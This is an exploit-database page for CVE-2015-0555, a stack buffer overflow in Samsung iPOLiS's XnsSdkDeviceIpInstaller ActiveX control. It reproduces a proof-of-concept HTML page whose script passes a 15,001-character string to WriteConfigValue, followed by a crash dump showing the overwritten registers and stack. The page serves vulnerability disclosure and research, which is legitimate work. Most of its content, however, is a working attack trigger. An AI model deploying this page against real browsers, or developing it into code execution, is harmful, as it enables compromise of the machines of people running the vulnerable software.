header-logo
Suggest Exploit
vendor:
iPOLiS Device Manager
by:
Praveen Darshanam
9.3
CVSS
HIGH
Remote Code Execution
119
CWE
Product Name: iPOLiS Device Manager
Affected Version From: Samsung iPOLiS 1.12.2
Affected Version To: Samsung iPOLiS 1.12.2
Patch Exists: NO
Related CWE: CVE-2015-0555
CPE: a:samsung:ipolis_device_manager
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=107055https://www.infosecmatter.com/nessus-plugin-library/?id=106967https://www.infosecmatter.com/nessus-plugin-library/?id=106972
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Ultimate N SP1
2015

(0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)

A vulnerability exists in Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX, which could allow an attacker to execute arbitrary code on the vulnerable system. This is due to a stack-based buffer overflow in the WriteConfigValue() method of the XNSSDKDEVICELib.XnsSdkDevice ActiveX control (XnsSdkDeviceIpInstaller.ocx) when handling a long argument. An attacker can exploit this vulnerability by enticing a victim to visit a malicious web page containing a specially crafted HTML that would trigger the overflow.

Mitigation:

No known mitigation is available at this time.
Source

Exploit-DB raw data:

<!--
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->

<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function WriteConfigValue ( ByVal szKey As String ,  ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2
CERT tried to coordinate but there wasn't any response from Samsung
-->
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var arg1 = "";
var arg2="praveend";

for (i=0; i<= 15000; i++)
{
	arg1 += "A";
}

target.WriteConfigValue(arg1 ,arg2);

</script>
</html>

<!--
#############Stack Trace####################
Exception Code: ACCESS_VIOLATION
Disasm: 149434	MOV AL,[ESI+EDX]

Seh Chain:
--------------------------------------------------
1 	647C7D7D 	mfc100.dll
2 	647D0937 	mfc100.dll
3 	64E242CA 	VBSCRIPT.dll
4 	77B3E0ED 	ntdll.dll


Called From                   Returns To
--------------------------------------------------
XNSSDKDEVICE.149434           41414141
41414141                      414141
414141                        3DA4C4
3DA4C4                        mfc100.647790C1
mfc100.647790C1               56746C75


Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C


Block Disassembly:
--------------------------------------------------
149423	XOR EDI,EDI
149425	XOR ESI,ESI
149427	MOV [EBP-8C],ECX
14942D	TEST ECX,ECX
14942F	JLE SHORT 00149496
149431	MOV EDX,[EBP+8]
149434	MOV AL,[ESI+EDX]	  <--- CRASH
149437	CMP AL,2F
149439	JNZ SHORT 00149489
14943B	MOV ECX,EBX
14943D	TEST ESI,ESI
14943F	JNZ SHORT 0014944D
149441	PUSH 159F28
149446	CALL 0014F7C0
14944B	JMP SHORT 00149476


ArgDump:
--------------------------------------------------
EBP+8	00414141
EBP+12	003DA4C4 -> Asc: defaultV
EBP+16	647790C1 -> EBE84589
EBP+20	FFFFFFFE
EBP+24	646CBE5C -> CCCCCCC3
EBP+28	0000001C


Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00  [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]

-->

Navigation

Suggest Exploit

Services By CQR